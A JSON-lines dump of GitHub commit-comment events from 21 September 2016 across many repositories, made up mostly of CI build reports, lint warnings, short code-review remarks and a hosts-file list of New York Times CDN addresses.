{"id":"4593812897","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107572,"position":null,"line":null,"path":null,"commit_id":"adf12cf0a2732048ad0cd5cf06c06af74de512da","created_at":"2016-09-21T03:15:21Z","updated_at":"2016-09-21T03:15:21Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-21T03:15:21Z"}
{"id":"4593813419","type":"CommitCommentEvent","actor":{"login":"shuyouliu"},"repo":{"name":"shuyouliu/zycloud"},"payload":{"comment":{"id":19107574,"position":null,"line":null,"path":null,"commit_id":"76d21f3c453a3e0a323621a17fa4b49e833bb41b","created_at":"2016-09-21T03:15:33Z","updated_at":"2016-09-21T03:15:33Z","body":"。"}},"created_at":"2016-09-21T03:15:33Z"}
{"id":"4593813605","type":"CommitCommentEvent","actor":{"login":"evan-a-a"},"repo":{"name":"Joshndroid/proprietary_vendor_huawei_angler"},"payload":{"comment":{"id":19107575,"position":1,"line":12,"path":"BoardConfigVendor.mk","commit_id":"474080ff476dab20a815db64ea79faf007421942","created_at":"2016-09-21T03:15:37Z","updated_at":"2016-09-21T03:15:37Z","body":"We don't need this"}},"created_at":"2016-09-21T03:15:37Z"}
{"id":"4593814246","type":"CommitCommentEvent","actor":{"login":"jjoshua2"},"repo":{"name":"syzygy1/Cfish"},"payload":{"comment":{"id":19107577,"position":null,"line":null,"path":null,"commit_id":"63a35c574c599a81f43bc28ff8ee56f6e4d947bc","created_at":"2016-09-21T03:15:52Z","updated_at":"2016-09-21T03:15:52Z","body":"It seemed like it was between 0.3 and 0.5% speedup on windows with popcnt build"}},"created_at":"2016-09-21T03:15:52Z"}
{"id":"4593815550","type":"CommitCommentEvent","actor":{"login":"evan-a-a"},"repo":{"name":"Joshndroid/proprietary_vendor_huawei_angler"},"payload":{"comment":{"id":19107582,"position":1,"line":12,"path":"Android.mk","commit_id":"474080ff476dab20a815db64ea79faf007421942","created_at":"2016-09-21T03:16:26Z","updated_at":"2016-09-21T03:16:26Z","body":"Remove dex preopt disable for the apps here. We want to preopt everything."}},"created_at":"2016-09-21T03:16:26Z"}
{"id":"4593819994","type":"CommitCommentEvent","actor":{"login":"kuaisufei"},"repo":{"name":"kuaisufei/Cipher"},"payload":{"comment":{"id":19107593,"position":null,"line":null,"path":null,"commit_id":"00a46a0f615e7713507ca60fdced69bdd61dbd9a","created_at":"2016-09-21T03:18:11Z","updated_at":"2016-09-21T03:18:11Z","body":"update"}},"created_at":"2016-09-21T03:18:11Z"}
{"id":"4593821320","type":"CommitCommentEvent","actor":{"login":"junkdog"},"repo":{"name":"sonirico/artemis-odb-orion"},"payload":{"comment":{"id":19107595,"position":16,"line":60,"path":"src/main/java/se/feomedia/orion/Executor.java","commit_id":"f091ded2835a0417d31a957ca34996f94667cada","created_at":"2016-09-21T03:18:41Z","updated_at":"2016-09-21T03:18:41Z","body":"it's still spaces; i think you auto-convert to spaces when saving, just a hunch. (I run with visible whitespace).\r\n\r\n![white-space](https://cloud.githubusercontent.com/assets/804039/18696619/cd26a1e8-7fba-11e6-8d10-18be414f37a7.png)\r\n"}},"created_at":"2016-09-21T03:18:41Z"}
{"id":"4593822694","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":19107596,"position":null,"line":null,"path":null,"commit_id":"540f0ba4287f280c909a1adba8c4595717988255","created_at":"2016-09-21T03:19:16Z","updated_at":"2016-09-21T03:19:16Z","body":"[R/irlba.R:289:1:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/R/irlba.R#L289) *style:* **lines should not be more than 130 characters.**\n```r\n​      if (verbose) message(\"Initializing starting vector v with samples from standard normal distribution.\\nUse `set.seed` first for reproducibility.\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/irlba.R:331:9:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/R/irlba.R#L331) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tol * ans$d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n        ^\n```\n[R/irlba.R:624:5:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/R/irlba.R#L624) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(tol * d[1] < eps) warning(\"convergence criterion below machine epsilon\")\n    ^\n```\n[tests/edge.R:30:19:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L30) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​for (tol in 10 ^ -(7:12))\n                  ^\n```\n[tests/edge.R:60:22:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                     ^\n```\n[tests/edge.R:60:24:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                       ^\n```\n[tests/edge.R:60:26:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                         ^\n```\n[tests/edge.R:60:28:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                           ^\n```\n[tests/edge.R:60:30:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                             ^\n```\n[tests/edge.R:60:32:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                               ^\n```\n[tests/edge.R:60:34:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                 ^\n```\n[tests/edge.R:60:36:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L60) *style:* **Commas should always have a space after.**\n```r\n​s1 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4)\n                                   ^\n```\n[tests/edge.R:62:22:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                     ^\n```\n[tests/edge.R:62:24:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                       ^\n```\n[tests/edge.R:62:26:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                         ^\n```\n[tests/edge.R:62:28:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                           ^\n```\n[tests/edge.R:62:30:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                             ^\n```\n[tests/edge.R:62:32:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                               ^\n```\n[tests/edge.R:62:34:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                 ^\n```\n[tests/edge.R:62:36:](https://github.com/bwlewis/irlba/blob/540f0ba4287f280c909a1adba8c4595717988255/tests/edge.R#L62) *style:* **Commas should always have a space after.**\n```r\n​s2 <- irlba(diag(c(1,2,3,4,5,0,0,0,0)), 4, fastpath=FALSE)\n                                   ^\n```"}},"created_at":"2016-09-21T03:19:16Z"}
{"id":"4593823010","type":"CommitCommentEvent","actor":{"login":"johnraff"},"repo":{"name":"BunsenLabs/bunsen-pipemenus"},"payload":{"comment":{"id":19107598,"position":null,"line":null,"path":null,"commit_id":"64133dd99db0542dbbc4f739b7003a78af2ea477","created_at":"2016-09-21T03:19:20Z","updated_at":"2016-09-21T03:19:20Z","body":"Yes, absent-mindedly double-clicking a script can have quite irritating results if it's executable.\r\nNot everyone lives in a CLI, and not everyone loves vim.\r\n\r\n> I didn't follow all those small changes to this repository\r\n\r\nThat was a [comment](https://github.com/BunsenLabs/bunsen-utilities/commit/db28c2346bb107b20e9a6a56ae2874265dfe7997#commitcomment-18666762) I made on a [commit](https://github.com/BunsenLabs/bunsen-utilities/commit/db28c2346bb107b20e9a6a56ae2874265dfe7997) *you* had made (in a different repository)!\r\n\r\n----\r\n\r\n> I've lost track of merlin vs deuterium a while ago.\r\n\r\n*merlin* is only for bl-exit development in **bunsen-utilities**, mostly by @xaosfiftytwo. \r\n*deuterium* in a number of (most?) BL packages is the hold-all for a bunch of changes that will be merged into the various master branches when everything's ready. Maybe another month.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-21T03:19:20Z"}
{"id":"4593824830","type":"CommitCommentEvent","actor":{"login":"staehle"},"repo":{"name":"staehle/adna"},"payload":{"comment":{"id":19107604,"position":null,"line":null,"path":null,"commit_id":"89b7e983eb223845bd66cb969b570cdd162508c3","created_at":"2016-09-21T03:20:01Z","updated_at":"2016-09-21T03:20:01Z","body":"Fitting that this is commit #500"}},"created_at":"2016-09-21T03:20:01Z"}
{"id":"4593825249","type":"CommitCommentEvent","actor":{"login":"jzillmann"},"repo":{"name":"Dica-Developer/weplantaforest"},"payload":{"comment":{"id":19107606,"position":65,"line":72,"path":"gradle/deploy.gradle","commit_id":"e6d1c5625c80dc31f0053a8ccd4b31eb64ca480f","created_at":"2016-09-21T03:20:09Z","updated_at":"2016-09-21T03:20:09Z","body":"Shouldn't that be a move then ? The below put will not remove removed files like the rsync did..."}},"created_at":"2016-09-21T03:20:09Z"}
{"id":"4593826447","type":"CommitCommentEvent","actor":{"login":"yaroslavvb"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":19107608,"position":null,"line":null,"path":null,"commit_id":"6cc37af4fb179c11504874d60ad53e4a91a4a887","created_at":"2016-09-21T03:20:32Z","updated_at":"2016-09-21T03:20:32Z","body":"Here's a [repro](https://gist.github.com/yaroslavvb/d78bd43edd99987248b655224c4ac615)\r\nIf you run it, it shows`update_constant` getting placed on `/job:worker/replica:0/task:0` device, and `update_variable` gets placed on `/job:worker/replica:0/task:1`  even though I'm pinning them both to `task:1` device\r\n\r\n```\r\npython placement.py\r\n....\r\nupdate_variable/Initializer/ones: /job:worker/replica:0/task:1/cpu:0\r\nI tensorflow/core/common_runtime/simple_placer.cc:818] update_variable/Initializer/ones: /job:worker/replica:0/task:1/cpu:0\r\nupdate_constant: /job:worker/replica:0/task:0/cpu:0\r\nI tensorflow/core/common_runtime/simple_placer.cc:818] update_constant: /job:worker/replica:0/task:0/cpu:0\r\n\r\n\r\n```"}},"created_at":"2016-09-21T03:20:32Z"}
{"id":"4593830380","type":"CommitCommentEvent","actor":{"login":"baulig"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19107612,"position":null,"line":null,"path":null,"commit_id":"7919e9abf8faf9ed2e10201bde097b75fcd5cb3c","created_at":"2016-09-21T03:22:05Z","updated_at":"2016-09-21T03:22:05Z","body":"This breaks the `mobile_static` profile (see for instance https://jenkins.mono-project.com/job/test-mono-pull-request-amd64-mobile_static/693/)\r\n\r\n    $ pwd\r\n    /Workspace/mono-stable/mcs/class/Facades/System.Reflection.Emit.Lightweight\r\n    $ make PROFILE=mobile_static\r\n    make do-all TOP_LEVEL_DO=do-all\r\n    make all-local\r\n    MCS     [mobile_static] System.Reflection.Emit.Lightweight.dll\r\n    TypeForwarders.cs(24,99): error CS0234: The type or namespace name `DynamicMethod' does not exist in the namespace `System.Reflection.Emit'. Are you missing an assembly reference?\r\n    Compilation failed: 1 error(s), 0 warnings\r\n"}},"created_at":"2016-09-21T03:22:05Z"}
{"id":"4593830666","type":"CommitCommentEvent","actor":{"login":"benjioh5"},"repo":{"name":"benjioh5/icewall-guideline"},"payload":{"comment":{"id":19107614,"position":null,"line":null,"path":null,"commit_id":"2064497afb83a913dcffc14a98d2e47745e18947","created_at":"2016-09-21T03:22:12Z","updated_at":"2016-09-21T03:22:12Z","body":"한국 대학들 다 .ac.kr 아니였나?? @miaekim"}},"created_at":"2016-09-21T03:22:12Z"}
{"id":"4593838385","type":"CommitCommentEvent","actor":{"login":"fijimunkii"},"repo":{"name":"ZJONSSON/clues"},"payload":{"comment":{"id":19107622,"position":null,"line":null,"path":null,"commit_id":"515bb0451974745772a70e31e291c6d0cd513956","created_at":"2016-09-21T03:25:11Z","updated_at":"2016-09-21T03:25:11Z","body":"👍 "}},"created_at":"2016-09-21T03:25:11Z"}
{"id":"4593843905","type":"CommitCommentEvent","actor":{"login":"LikeQuite"},"repo":{"name":"LikeQuite/hxwdemo"},"payload":{"comment":{"id":19107635,"position":88,"line":88,"path":"CHMyProgressBar.cs","commit_id":"1a65cdf381fea022fcf23699dfef1ab1597b74e3","created_at":"2016-09-21T03:27:13Z","updated_at":"2016-09-21T03:27:13Z","body":"a\r\n"}},"created_at":"2016-09-21T03:27:13Z"}
{"id":"4593845716","type":"CommitCommentEvent","actor":{"login":"janko-m"},"repo":{"name":"jayroh/dotfiles.new"},"payload":{"comment":{"id":19107637,"position":null,"line":null,"path":null,"commit_id":"183dc9b23ed750a2df25eab505e55038bcf322f8","created_at":"2016-09-21T03:27:55Z","updated_at":"2016-09-21T03:27:55Z","body":"You're welcome! 😃"}},"created_at":"2016-09-21T03:27:55Z"}
{"id":"4593846074","type":"CommitCommentEvent","actor":{"login":"xyting"},"repo":{"name":"xyting/RigoFunc.Account"},"payload":{"comment":{"id":19107638,"position":null,"line":null,"path":null,"commit_id":"7314032574997f4146c5ec21700b347574e9958a","created_at":"2016-09-21T03:28:04Z","updated_at":"2016-09-21T03:28:04Z","body":"@logosbin Yes, but FluentValidation will better than ValidateAttribute, create a new Issue to do that"}},"created_at":"2016-09-21T03:28:04Z"}
{"id":"4593847615","type":"CommitCommentEvent","actor":{"login":"achmadrifaldi"},"repo":{"name":"felix1712/Schedule-app"},"payload":{"comment":{"id":19107639,"position":13,"line":13,"path":"app/controllers/events_controller.rb","commit_id":"22edb3e3dc49a5c59aa740f26f203b4e66e99b69","created_at":"2016-09-21T03:28:39Z","updated_at":"2016-09-21T03:28:39Z","body":"rapihkan code pada line kondisi if else"}},"created_at":"2016-09-21T03:28:39Z"}
{"id":"4593849022","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19107643,"position":null,"line":null,"path":null,"commit_id":"fbaa2a47814ac1d9146f789f92ee1baacca2e3d5","created_at":"2016-09-21T03:29:12Z","updated_at":"2016-09-21T03:29:12Z","body":"Todo:\r\n- [ ] Delete `_gc`"}},"created_at":"2016-09-21T03:29:12Z"}
{"id":"4593849636","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19107647,"position":null,"line":null,"path":null,"commit_id":"69affeb17a69b05df08437f1c3ced982c7eac0f7","created_at":"2016-09-21T03:29:27Z","updated_at":"2016-09-21T03:29:27Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2285 of 2479 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.17%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T03:29:27Z"}
{"id":"4593850652","type":"CommitCommentEvent","actor":{"login":"wwj578594205"},"repo":{"name":"wwj578594205/Day30adaptepingmu"},"payload":{"comment":{"id":19107653,"position":4,"line":4,"path":"app/src/main/AndroidManifest.xml","commit_id":"f1d77763ae1258cc3e7390570cf8a02333ad4d73","created_at":"2016-09-21T03:29:51Z","updated_at":"2016-09-21T03:29:51Z","body":"修改"}},"created_at":"2016-09-21T03:29:51Z"}
{"id":"4593852114","type":"CommitCommentEvent","actor":{"login":"wwj578594205"},"repo":{"name":"wwj578594205/Day30adaptepingmu"},"payload":{"comment":{"id":19107660,"position":null,"line":null,"path":null,"commit_id":"f1d77763ae1258cc3e7390570cf8a02333ad4d73","created_at":"2016-09-21T03:30:24Z","updated_at":"2016-09-21T03:30:24Z","body":"我们都是中国人"}},"created_at":"2016-09-21T03:30:24Z"}
{"id":"4593852257","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19107661,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T03:30:28Z","updated_at":"2016-09-21T03:30:28Z","body":"#4538"}},"created_at":"2016-09-21T03:30:28Z"}
{"id":"4593854380","type":"CommitCommentEvent","actor":{"login":"zackkatz"},"repo":{"name":"gravityview/GravityView"},"payload":{"comment":{"id":19107666,"position":null,"line":null,"path":null,"commit_id":"4c149d48ed182d0e41b0c57cb41883e7694c1133","created_at":"2016-09-21T03:31:17Z","updated_at":"2016-09-21T03:31:17Z","body":"I should have removed this when merging from PR. Damn."}},"created_at":"2016-09-21T03:31:17Z"}
{"id":"4593858647","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19107687,"position":null,"line":null,"path":null,"commit_id":"f0ad4d118f63f5334be54fab1f77be147491ee5e","created_at":"2016-09-21T03:32:50Z","updated_at":"2016-09-21T03:32:50Z","body":"MoreDayliteFollowup (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2330 of 2338 tests passed, 26 test warnings)\n\n * 5 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 32 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 8 tests had: Table big diffs.\n * 3 tests had: RDD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0ad4d118f63f5334be54fab1f77be147491ee5e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T03:32:50Z"}
{"id":"4593858883","type":"CommitCommentEvent","actor":{"login":"eortegaf"},"repo":{"name":"eortegaf/test1"},"payload":{"comment":{"id":19107689,"position":null,"line":null,"path":null,"commit_id":"84c6bb565482fd9bd6167da645e496a03252ddb2","created_at":"2016-09-21T03:32:55Z","updated_at":"2016-09-21T03:32:55Z","body":"this is a test comment"}},"created_at":"2016-09-21T03:32:55Z"}
{"id":"4593864592","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19107701,"position":null,"line":null,"path":null,"commit_id":"69affeb17a69b05df08437f1c3ced982c7eac0f7","created_at":"2016-09-21T03:35:04Z","updated_at":"2016-09-21T03:35:04Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-69affeb17a69b05df08437f1c3ced982c7eac0f7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-21T03:35:04Z"}
{"id":"4593866547","type":"CommitCommentEvent","actor":{"login":"Pixel-Pirate"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19107707,"position":null,"line":null,"path":null,"commit_id":"bba7b6a554c3be59edc2a9b520e5ba132b0efc52","created_at":"2016-09-21T03:35:45Z","updated_at":"2016-09-21T03:35:45Z","body":"that's great !"}},"created_at":"2016-09-21T03:35:45Z"}
{"id":"4593866990","type":"CommitCommentEvent","actor":{"login":"dsuare1"},"repo":{"name":"dsuare1/the_round_about"},"payload":{"comment":{"id":19107708,"position":null,"line":null,"path":null,"commit_id":"efe70b440bb0d5a7a2b7e1d41aca4e677664cbae","created_at":"2016-09-21T03:35:55Z","updated_at":"2016-09-21T03:35:55Z","body":"-Database seeds successfully inserted (terminal command: mongoimport --db the_round_about --collection events --drop < ~/Desktop/ut-bc/course-work/final-project/the_round_about/dbSeederEvents.json)\r\n\r\n-staff picks dynamically inserted into index view"}},"created_at":"2016-09-21T03:35:55Z"}
{"id":"4593870121","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19107715,"position":null,"line":null,"path":null,"commit_id":"6f05df22bc28844ccd99519d6311887d45768977","created_at":"2016-09-21T03:37:06Z","updated_at":"2016-09-21T03:37:06Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-21T03:37:06Z"}
{"id":"4593877123","type":"CommitCommentEvent","actor":{"login":"mh4x0f"},"repo":{"name":"P0cL4bs/WiFi-Pumpkin"},"payload":{"comment":{"id":19107725,"position":null,"line":null,"path":null,"commit_id":"71548a9f3f686ef93050d523301b8547f840a0ed","created_at":"2016-09-21T03:39:55Z","updated_at":"2016-09-21T03:39:55Z","body":"#65 "}},"created_at":"2016-09-21T03:39:55Z"}
{"id":"4593878716","type":"CommitCommentEvent","actor":{"login":"LGA1150"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19107730,"position":null,"line":null,"path":null,"commit_id":"223959afa8b7ba06b094b3508881758215d84827","created_at":"2016-09-21T03:40:36Z","updated_at":"2016-09-21T03:40:36Z","body":"www.nytimes.com 有Akamai CDN: e5482.g.akamaiedge.net\r\n电信用 184.84.127.110 或 173.223.46.242\r\n联通用 23.42.184.236 或 23.66.153.214\r\n移动用 23.66.41.214 或 23.66.153.214\r\n\r\n```\r\n184.84.127.110 www.nytimes.com\r\n184.84.127.110 typeface.nyt.com\r\n184.84.127.110 a1.nyt.com\r\n184.84.127.110 s1.nyt.com\r\n184.84.127.110 i1.nyt.com\r\n184.84.127.110 static01.nyt.com\r\n184.84.127.110 static02.nyt.com\r\n184.84.127.110 static03.nyt.com\r\n184.84.127.110 static04.nyt.com\r\n184.84.127.110 static05.nyt.com\r\n184.84.127.110 static06.nyt.com\r\n184.84.127.110 static07.nyt.com\r\n184.84.127.110 static08.nyt.com\r\n184.84.127.110 static09.nyt.com\r\n184.84.127.110 js.nyt.com\r\n184.84.127.110 css.nyt.com\r\n184.84.127.110 graphics8.nytimes.com\r\n184.84.127.110 json8.nytimes.com\r\n184.84.127.110 typeface.nytimes.com\r\n184.84.127.110 int.nyt.com\r\n```"}},"created_at":"2016-09-21T03:40:36Z"}
{"id":"4593883235","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19107739,"position":8,"line":8,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-21T03:42:28Z","updated_at":"2016-09-21T03:42:28Z","body":"space_index looks unused"}},"created_at":"2016-09-21T03:42:28Z"}
{"id":"4593883438","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19107740,"position":null,"line":null,"path":null,"commit_id":"223959afa8b7ba06b094b3508881758215d84827","created_at":"2016-09-21T03:42:33Z","updated_at":"2016-09-21T03:42:33Z","body":"开pr啊……【跪\r\n\r\n\r\n\r\nOn LGA1150 <notifications@github.com>, Sep 21, 2016 11:41 AM wrote:\r\n\r\nwww.nytimes.com<http://www.nytimes.com> 有Akamai CDN: e5482.g.akamaiedge.net\r\n电信用 184.84.127.110 或 173.223.46.242\r\n联通用 23.42.184.236 或 23.66.153.214\r\n移动用 23.66.41.214 或 23.66.153.214\r\n\r\n184.84.127.110 www.nytimes.com\r\n184.84.127.110 typeface.nyt.com\r\n184.84.127.110 a1.nyt.com\r\n184.84.127.110 s1.nyt.com\r\n184.84.127.110 i1.nyt.com\r\n184.84.127.110 static01.nyt.com\r\n184.84.127.110 static02.nyt.com\r\n184.84.127.110 static03.nyt.com\r\n184.84.127.110 static04.nyt.com\r\n184.84.127.110 static05.nyt.com\r\n184.84.127.110 static06.nyt.com\r\n184.84.127.110 static07.nyt.com\r\n184.84.127.110 static08.nyt.com\r\n184.84.127.110 static09.nyt.com\r\n184.84.127.110 js.nyt.com\r\n184.84.127.110 css.nyt.com\r\n184.84.127.110 graphics8.nytimes.com\r\n184.84.127.110 json8.nytimes.com\r\n184.84.127.110 typeface.nytimes.com\r\n184.84.127.110 int.nyt.com\r\n\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://github.com/racaljk/hosts/commit/223959afa8b7ba06b094b3508881758215d84827#commitcomment-19107730>, or mute the thread<https://github.com/notifications/unsubscribe-auth/APu4H3CJaZHKSbJQes6TOh_hEXlmVorXks5qsKdagaJpZM4JwqBN>.\r\n"}},"created_at":"2016-09-21T03:42:33Z"}
